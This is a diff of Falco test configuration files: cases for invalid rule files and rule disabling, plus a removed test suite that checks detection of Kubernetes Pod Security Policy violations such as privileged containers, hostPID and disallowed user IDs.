desc: some desc
condition: bar
output: some output
priority: INFO
append: true
---
validate_rules_file:
- rules/invalid_base_rule.yaml
- rules/invalid_append_rule.yaml
trace_file: trace_files/cat_write.scap
invalid_overwrite_rule_multiple_docs:
exit_status: 1
stdout_is: |+
Undefined macro 'bar' used in filter.
---
- rule: some rule
desc: some desc
condition: bar
output: some output
priority: INFO
append: false
---
validate_rules_file:
- rules/invalid_overwrite_rule_multiple_docs.yaml
trace_file: trace_files/cat_write.scap
invalid_append_rule_multiple_docs:
exit_status: 1
stdout_contains: |+
Compilation error when compiling "evt.type=open bar": 15: syntax error, unexpected 'bar', expecting 'or', 'and'
---
- rule: some rule
desc: some desc
condition: evt.type=open
output: some output
priority: INFO
- rule: some rule
desc: some desc
condition: bar
output: some output
priority: INFO
append: true
---
validate_rules_file:
- rules/invalid_append_rule_multiple_docs.yaml
trace_file: trace_files/cat_write.scap
invalid_missing_rule_name:
exit_status: 1
stdout_is: |+
@@ -610,13 +447,13 @@ trace_files: !mux
- open_from_cat
trace_file: trace_files/cat_write.scap
disabled_rules_using_substring:
disabled_rules_using_regex:
detect: False
rules_file:
- rules/empty_rules.yaml
- rules/single_rule.yaml
disabled_rules:
- "open_from"
- "open.*"
trace_file: trace_files/cat_write.scap
disabled_rules_using_enabled_flag:

3
test/falco_tests_package.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

666
test/falco_tests_psp.yaml
View File

@@ -1,666 +0,0 @@
#
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
trace_files: !mux
privileged_detect_k8s_audit:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_privileged Violation (privileged) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/privileged.yaml
trace_file: trace_files/psp/privileged.json
privileged_detect_syscall:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_privileged Violation (privileged) System Activity": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/privileged.yaml
trace_file: trace_files/psp/privileged.scap
privileged_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/privileged.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
host_pid_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_host_pid Violation (hostPID)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_pid.yaml
trace_file: trace_files/psp/host_pid.json
host_pid_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_pid.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
host_ipc_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_host_ipc Violation (hostIPC)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_ipc.yaml
trace_file: trace_files/psp/host_ipc.json
host_ipc_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_ipc.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
host_network_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_host_network Violation (hostNetwork)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_network.yaml
trace_file: trace_files/psp/host_network.json
host_network_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_network.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
host_network_ports_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP host_ports_100_200_only Violation (hostPorts)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_network_ports.yaml
trace_file: trace_files/psp/host_network_ports.json
host_network_ports_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/host_network_ports.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
volumes_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP only_secret_volumes Violation (volumes)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/volumes.yaml
trace_file: trace_files/psp/mount_etc_using_host_path.json
volumes_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/volumes.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
allowed_host_paths_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP only_mount_host_usr Violation (allowedHostPaths)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_host_paths.yaml
trace_file: trace_files/psp/mount_etc_using_host_path.json
allowed_host_paths_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_host_paths.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
allowed_flex_volumes_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP only_lvm_cifs_flex_volumes Violation (allowedFlexVolumes)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/flex_volumes.yaml
trace_file: trace_files/psp/flex_volumes.json
allowed_flex_volumes_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/flex_volumes.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
fs_group_must_run_as_with_unset:
detect: True
detect_level: WARNING
detect_counts:
- "PSP fs_group_must_run_as_30 Violation (fsGroup)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/fs_group_must_run_as.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
fs_group_must_run_as:
detect: True
detect_level: WARNING
detect_counts:
- "PSP fs_group_must_run_as_30 Violation (fsGroup)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/fs_group_must_run_as.yaml
trace_file: trace_files/psp/fs_group.json
fs_group_may_run_as:
detect: True
detect_level: WARNING
detect_counts:
- "PSP fs_group_may_run_as_30 Violation (fsGroup)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/fs_group_may_run_as.yaml
trace_file: trace_files/psp/fs_group.json
fs_group_may_run_as_with_unset:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/fs_group_may_run_as.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
fs_group_run_as_any:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/fs_group_run_as_any.yaml
trace_file: trace_files/psp/fs_group.json
fs_group_run_as_any_with_unset:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/fs_group_run_as_any.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
read_only_root_fs_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP read_only_root_fs Violation (readOnlyRootFilesystem) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/read_only_root_fs.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
read_only_root_fs_detect_syscall:
detect: True
detect_level: WARNING
detect_counts:
- "PSP read_only_root_fs Violation (readOnlyRootFilesystem) System Activity": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/read_only_root_fs.yaml
trace_file: trace_files/psp/write_tmp_test.scap
read_only_root_fs_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/read_only_root_fs.yaml
trace_file: trace_files/psp/read_only_root_fs.json
user_must_run_as_with_unset:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_30 Violation (runAsUser=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
user_must_run_as_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_30 Violation (runAsUser=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_1000_container.json
user_must_run_as_detect_syscall:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_30 Violation (runAsUser=MustRunAs) System Activity": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_65534_container.scap
user_must_run_as_not_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_30_container.json
user_must_run_as_detect_sec_ctx:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_30 Violation (runAsUser=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_1000_sec_ctx.json
user_must_run_as_not_detect_sec_ctx:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_30_sec_ctx.json
user_must_run_as_detect_both:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_30 Violation (runAsUser=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_30_sec_ctx_1000_container.json
user_must_run_as_not_detect_both:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_1000_sec_ctx_30_container.json
user_must_run_as_non_root_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_non_root Violation (runAsUser=MustRunAsNonRoot) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as_non_root.yaml
trace_file: trace_files/psp/run_as_user_0_container.json
user_must_run_as_non_root_detect_syscall:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_non_root Violation (runAsUser=MustRunAsNonRoot) System Activity": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as_non_root.yaml
trace_file: trace_files/psp/run_as_user_0_container.scap
user_must_run_as_non_root_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as_non_root.yaml
trace_file: trace_files/psp/run_as_user_1000_container.json
user_must_run_as_non_root_detect_sec_ctx:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_non_root Violation (runAsUser=MustRunAsNonRoot) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as_non_root.yaml
trace_file: trace_files/psp/run_as_user_0_sec_ctx.json
user_must_run_as_non_root_no_detect_sec_ctx:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as_non_root.yaml
trace_file: trace_files/psp/run_as_user_1000_sec_ctx.json
user_must_run_as_non_root_detect_both:
detect: True
detect_level: WARNING
detect_counts:
- "PSP user_must_run_as_non_root Violation (runAsUser=MustRunAsNonRoot) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as_non_root.yaml
trace_file: trace_files/psp/run_as_user_1000_sec_ctx_0_container.json
user_must_run_as_non_root_no_detect_both:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/user_must_run_as_non_root.yaml
trace_file: trace_files/psp/run_as_user_0_sec_ctx_1000_container.json
group_must_run_as_with_unset:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_must_run_as_30 Violation (runAsGroup=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
group_must_run_as_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_must_run_as_30 Violation (runAsGroup=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/run_as_group_1000_container.json
group_must_run_as_detect_syscall:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_must_run_as_30 Violation (runAsGroup=MustRunAs) System Activity": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/run_as_user_65534_container.scap
group_must_run_as_not_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/run_as_group_30_container.json
group_must_run_as_detect_sec_ctx:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_must_run_as_30 Violation (runAsGroup=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/run_as_group_1000_sec_ctx.json
group_must_run_as_not_detect_sec_ctx:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/run_as_group_30_sec_ctx.json
group_must_run_as_detect_both:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_must_run_as_30 Violation (runAsGroup=MustRunAs) K8s Audit": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/run_as_group_30_sec_ctx_1000_container.json
group_must_run_as_not_detect_both:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_must_run_as.yaml
trace_file: trace_files/psp/run_as_group_1000_sec_ctx_30_container.json
group_may_run_as_with_unset:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_may_run_as.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
group_may_run_as_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_may_run_as_30 Violation (runAsGroup=MayRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_may_run_as.yaml
trace_file: trace_files/psp/run_as_group_1000_container.json
group_may_run_as_not_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_may_run_as.yaml
trace_file: trace_files/psp/run_as_group_30_container.json
group_may_run_as_detect_sec_ctx:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_may_run_as_30 Violation (runAsGroup=MayRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_may_run_as.yaml
trace_file: trace_files/psp/run_as_group_1000_sec_ctx.json
group_may_run_as_not_detect_sec_ctx:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_may_run_as.yaml
trace_file: trace_files/psp/run_as_group_30_sec_ctx.json
group_may_run_as_detect_both:
detect: True
detect_level: WARNING
detect_counts:
- "PSP group_may_run_as_30 Violation (runAsGroup=MayRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_may_run_as.yaml
trace_file: trace_files/psp/run_as_group_30_sec_ctx_1000_container.json
group_may_run_as_not_detect_both:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/group_may_run_as.yaml
trace_file: trace_files/psp/run_as_group_1000_sec_ctx_30_container.json
supplemental_groups_must_run_as_with_unset:
detect: True
detect_level: WARNING
detect_counts:
- "PSP supplemental_groups_must_run_as_30 Violation (supplementalGroups=MustRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_must_run_as_30_40.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
supplemental_groups_must_run_as_no_overlap:
detect: True
detect_level: WARNING
detect_counts:
- "PSP supplemental_groups_must_run_as_30 Violation (supplementalGroups=MustRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_must_run_as_30_40.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
supplemental_groups_must_run_as_partial_overlap:
detect: True
detect_level: WARNING
detect_counts:
- "PSP supplemental_groups_must_run_as_30_10 Violation (supplementalGroups=MustRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_must_run_as_30_40_10_15.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
supplemental_groups_must_run_as_overlap:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_must_run_as_10_20.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
supplemental_groups_must_run_as_overlap_multiple_ranges:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_must_run_as_10_40_10_20.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
supplemental_groups_may_run_as_with_unset:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_may_run_as_30_40.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
supplemental_groups_may_run_as_no_overlap:
detect: True
detect_level: WARNING
detect_counts:
- "PSP supplemental_groups_may_run_as_30 Violation (supplementalGroups=MayRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_may_run_as_30_40.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
supplemental_groups_may_run_as_partial_overlap:
detect: True
detect_level: WARNING
detect_counts:
- "PSP supplemental_groups_may_run_as_30_10 Violation (supplementalGroups=MayRunAs)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_may_run_as_30_40_10_15.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
supplemental_groups_may_run_as_overlap:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_may_run_as_10_20.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
supplemental_groups_may_run_as_overlap_multiple_ranges:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/supplemental_groups_may_run_as_10_40_10_20.yaml
trace_file: trace_files/psp/supplemental_groups_10_20.json
privilege_escalation_privilege_escalation_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_privilege_escalation Violation (allowPrivilegeEscalation)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/privilege_escalation.yaml
trace_file: trace_files/psp/privilege_escalation.json
allowed_capabilities_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP allow_capability_sys_nice Violation (allowedCapabilities)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_capabilities.yaml
trace_file: trace_files/psp/capability_add_sys_time.json
allowed_capabilities_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_capabilities.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
allowed_capabilities_match:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_capabilities.yaml
trace_file: trace_files/psp/capability_add_sys_nice.json
allowed_proc_mount_types_detect:
detect: True
detect_level: WARNING
detect_counts:
- "PSP allow_default_proc_mount_type Violation (allowedProcMountTypes)": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_proc_mount_types.yaml
trace_file: trace_files/psp/proc_mount_type_unmasked.json
allowed_proc_mount_types_no_detect:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_proc_mount_types.yaml
trace_file: trace_files/psp/create_vanilla_nginx_deployment.json
allowed_proc_mount_types_match:
detect: False
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/allowed_proc_mount_types.yaml
trace_file: trace_files/psp/proc_mount_type_default.json
psp_name_with_dashes:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_privileged Violation (privileged) System Activity": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/privileged_name_with_dashes.yaml
trace_file: trace_files/psp/privileged.scap
psp_name_with_spaces:
detect: True
detect_level: WARNING
detect_counts:
- "PSP no_privileged Violation (privileged) System Activity": 1
rules_file: []
conf_file: confs/psp.yaml
psp_file: psps/privileged_name_with_spaces.yaml
trace_file: trace_files/psp/privileged.scap

3
test/falco_traces.yaml.in
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

Some files were not shown because too many files have changed in this diff Show More